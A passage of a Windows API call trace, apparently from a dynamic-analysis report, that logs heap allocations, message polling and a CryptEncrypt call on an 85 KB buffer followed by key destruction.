(in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0193.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0193.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0193.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0193.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0193.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0193.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0193.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0193.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0193.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0193.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0193.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0193.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0193.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0193.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0193.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0193.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0193.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0193.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0193.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0193.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0193.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0193.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0193.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0193.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0193.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0193.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0193.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0193.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0193.200] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0193.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0193.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0193.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0193.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0193.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0193.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0193.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0193.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0193.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0193.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0193.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0193.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0193.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0193.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b058 [0193.201] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0193.201] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0193.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0193.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0193.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0193.201] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0193.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0193.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0193.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0193.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0193.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0193.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0193.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0193.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0193.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0193.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0193.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0193.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0193.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0193.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0193.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0193.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0193.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0193.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0193.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0193.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0193.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0193.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0193.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0193.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0193.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0193.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0193.202] CharLowerBuffW (in: lpsz="byte[85281]", cchLength=0xb | out: lpsz="byte[85281]") returned 0xb [0193.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0193.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0193.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0193.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0193.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0193.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0193.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0193.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0193.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0193.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0193.203] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.203] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0193.203] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0193.203] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0193.203] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0193.203] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0193.203] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0193.203] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0193.204] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0193.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0193.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0193.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0193.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0193.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0193.205] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0193.205] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0193.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0193.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0193.207] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0193.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0193.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0193.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0193.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0193.207] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa88a48*, pdwDataLen=0x87e820*=0x14d15, dwBufLen=0x14d20 | out: pbData=0xa88a48*, pdwDataLen=0x87e820*=0x14d20) returned 1 [0193.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0193.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0193.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0193.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0193.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0193.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0193.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0193.208] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0193.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0193.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0193.208] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.209] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0193.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0193.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0193.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0193.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0193.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0193.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0193.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0193.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0193.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0193.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0193.211] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0193.211] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0193.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0193.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0193.211] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0193.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0193.211] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0193.211] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0193.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0193.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0193.211] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0193.211] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0193.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0193.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0193.211] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0193.212] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0193.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0193.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0193.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0193.212] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0193.212] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0193.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0193.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0193.212] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0193.212] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0193.212] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0193.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0193.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0193.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0193.289] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0193.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0193.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0193.289] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.289] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0193.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0193.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0193.297] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0193.297] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0193.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0193.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0193.297] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0193.298] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0193.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0193.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0193.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0193.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0193.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0193.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0193.298] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0193.298] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0193.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0193.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0193.298] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0193.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0193.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0193.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0193.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0193.298] CryptDestroyKey (hKey=0x90aed8) returned 1 [0193.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0193.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0193.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0193.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0193.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0193.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0193.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0193.299] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0193.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0193.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0193.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0193.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0193.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0193.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0193.299] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0193.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0193.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0193.299] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0193.299] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0193.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0193.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0193.300] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: 